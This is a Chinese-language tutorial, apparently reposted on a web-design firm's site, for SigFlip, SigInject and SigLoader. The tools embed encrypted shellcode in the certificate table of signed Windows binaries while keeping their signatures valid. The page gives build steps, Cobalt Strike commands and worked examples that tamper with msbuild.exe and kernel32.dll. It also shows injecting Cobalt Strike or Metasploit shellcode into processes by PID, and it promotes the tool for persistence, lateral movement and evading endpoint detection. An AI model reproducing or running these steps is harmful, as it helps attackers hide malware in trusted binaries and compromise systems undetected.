如何使用SigFlip篡改身份认证码签名的PE文件

关于SigFlip

SigFlip是一款能够篡改经过身份认证码签名的PE文件(exe、dll、sys等)的工具,而且整个过程不会影响或破坏已有的身份认证码签名。换句话来说,就是我们可以使用SigFlip向PE文件中嵌入数据(比如Shellcode),并且再不会破坏文件签名、完整性检查或PE文件功能的情况下,修改PE文件的校验和或哈希。

SigInject组件可以将Shellcode注入至PE文件的[WIN_CERTIFICATE]证书表中,并输出加密密钥以便配合BOF/C/C#加载器(SigLoader)一起使用。SigInject将保存针对PE文件的修改操作,并保证其签名和证书有效性不变。

SigLoader是一个基础加载器,它采用SigInject创建的修改后的PE文件路径和解密密钥作为参数,然后提取和解密嵌入的Shellcode,以供选择Shellcode注入使用。

SigFlip将检查PE哈希是否已成功更改,然后退出以绕过终端针对此类行为的检查。

SigFlip可以用于持久化感染、横向渗透以及命令/代码执行等场景。

注意事项:igFlip、SigInject和SigLoader将以BOF脚本和.NET程序集提供。

工具安装

广大研究人员可以使用下列命令将该项目源码克隆至本地:

 
 
      
  
  1. git clone https://github.com/med0x2e/SigFlip.git 
    2.

工具构建/编译

本项目并没有提供预编译的BOF,我们可以使用Mingw-w64来进行编译。如果是.NET,可以使用VS或csc.exe来编译.NET项目(SigFlip、SigLoader);如果是BOF,请按照下列步骤操作:

 
 
      
  
  1.  i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o 
    2.   
  
  2.  
    3.   
  
  3.  x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o 
    4.   
  
  4.  
    5.   
  
  5.  x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o 
    6.   
  
  6.  
    7.   
  
  7.  i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o 
    8.

确保所有的对象文件都存储在sigflip.cna的相同目录下,然后在Cobalt Strike中加载sigflip.cna。

注意事项:预编译的BOF使用的是mingw-64 v8.0.0_3,如果你所使用的mingw-64 >= v9,可能会出现崩溃的情况。

Cobalt Strike

执行程序集:

 
 
      
  
  1. execute-assembly SigFlip.exe -h 
    2.   
  
  2.  
    3.   
  
  3. execute-assembly SigLoader -h 
    4.

BOF:

当我们在Cobalt Strike中加载sigflip.cna了之后,将会注册两个新命令,我们此时就能够以下列方式使用SigFlip和SigInject了。

  • SigFlip:在不破坏签名或证书有效性的情况下,修改PE文件哈希:
    •   
  
         
   
    1. SigFlip "" "
      2.
  • SigInject:向PE文件的[WIN_CERTIFICATE]证书表中注入加密的Shellcode,打印的加密密钥可以跟基础C/C#加载器结合使用以保证签名和证书的完整性:
    •   
  
         
   
    1. SigInject " " "
      2.
  • SigLoader:从PE文件中加载由SigInject加密的Shellcode,然后使用Early Bird向指定进程注入Shellcode,我们可以自定义Shellcode的注入逻辑,或直接替换目标代码:
    •   
  
         
   
    1. SigLoader     
      2.

工具使用样例

(1) BOF

向msbuild.exe注入随机数据:

 
 
      
  
  1. SigFlip "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" "C:\lolbins\modified-msbuild.exe" 
    2.

向kernel32.ell注入Shellcode:

 
 
      
  
  1. SigInject "C:\Windows\System32\kernel32.dll" "C:\random\modified-kernel32.dll" "C:\shellcode\cobaltstrike_or_msf_shellcode.bin" 
    2.   
  
  2.  
    3.   
  
  3. Sigloader "C:\random\modified-kernel32.dll" "DECRYPTION_KEY" "C:\Windows\System32\werfault.exe" 6300 
    4.

(2) 执行程序集

向msbuild.exe注入随机数据:

 
 
      
  
  1. execute-assembly SigFlip.exe -b C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -o C:\Temp\MSBuild.exe 
    2.

向kernel32.ell注入Shellcode:

 
 
      
  
  1. execute-assembly SigFlip.exe -i C:\Windows\System32\kernel32.dll -s C:\Temp\x86shellcode.bin -o C:\Temp\kernel32.dll -e TestSecretKey 
    2.   
  
  2.  
    3.   
  
  3. execute-assembly SigLoader.exe -f C:\Temp\modified-kernel32.dll -e TestSecretKey -pid 2354 
    4.

项目地址

SigFlip:【GitHub传送门】

网页名称:如何使用SigFlip篡改身份认证码签名的PE文件
网页URL:http://www.csdahua.cn/qtweb/news1/475351.html

网站建设、网络推广公司-快上网,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 快上网

成都快上网为您推荐相关内容

Google知识

各行业网站

平昌保洁    成都展柜设计    成都全网营销推广    航空文化传媒    四川艾名斯    阿坝州网站建设    app开发    青羊雕琢时光    眉山网站建设    成都食品包装设计    网站改版    达州做网站    众诚伟业    wap网站建设    成都网站制作    成都网站营销    温江做网站    成都营销网站制作    犀浦封阳台    抖音代运营